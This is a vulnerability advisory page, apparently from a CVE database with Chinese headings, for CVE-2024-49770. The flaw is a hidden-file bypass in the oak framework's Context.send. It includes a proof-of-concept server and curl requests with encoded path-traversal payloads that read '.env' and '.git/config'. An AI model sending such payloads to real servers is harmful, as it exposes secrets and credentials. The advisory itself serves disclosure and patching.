CVE-2024-49770

描述

### Summary By default `oak` does not allow transferring of hidden files with `Context.send` API. However, this can be bypassed by encoding `/` as its URL encoded form `%2F`. ### Details 1.) Oak uses [decodeComponent](https://github.com/oakserver/oak/blob/3896fe568b25ac0b4c5afbf822ff8344c3d1712a/send.ts#L182C10-L182C25) which seems to be unexpected. This is also the reason why it is not possible to access a file that contains URL encoded characters unless the client URL encodes it first. 2.) The function [isHidden](https://github.com/oakserver/oak/blob/3896fe568b25ac0b4c5afbf822ff8344c3d1712a/send.ts#L117-L125) is flawed since it only checks if the first subpath is hidden, allowing secrets to be read from `subdir/.env`. ### PoC ```ts // server.ts import { Application } from "jsr:@oak/[email protected]"; const app = new Application(); app.use(async (context, next) => { try { await context.send({ root: './root', hidden: false, // default }); } catch { await next(); } }); await app.listen({ port: 8000 }); ``` In terminal: ```bash # setup root directory mkdir root/.git echo SECRET_KEY=oops > root/.env echo oops > root/.git/config # start server deno run -A server.ts # in another terminal curl -D- http://127.0.0.1:8000/poc%2f../.env curl -D- http://127.0.0.1:8000/poc%2f../.git/config ``` ### Impact For an attacker this has potential to read sensitive user data or to gain access to server secrets.

如何修補 CVE-2024-49770

目前尚未發布修補版本。可考慮移除受影響套件,或參考下方連結中的上游建議。

—未列出修補版本

CVE-2024-49770 正在被利用嗎?

低 — EPSS 為 0.1%,目前沒有觀察到大規模利用活動。

受影響套件(1)

from 0, <= 14.1.0

來源	版本	嚴重程度	向量
osv	CVSS 4.0	—	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
osv	CVSS 3.1	HIGH7.5	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

描述

如何修補 CVE-2024-49770

CVE-2024-49770 正在被利用嗎?

受影響套件(1)

CVSS 分數

參考連結(6)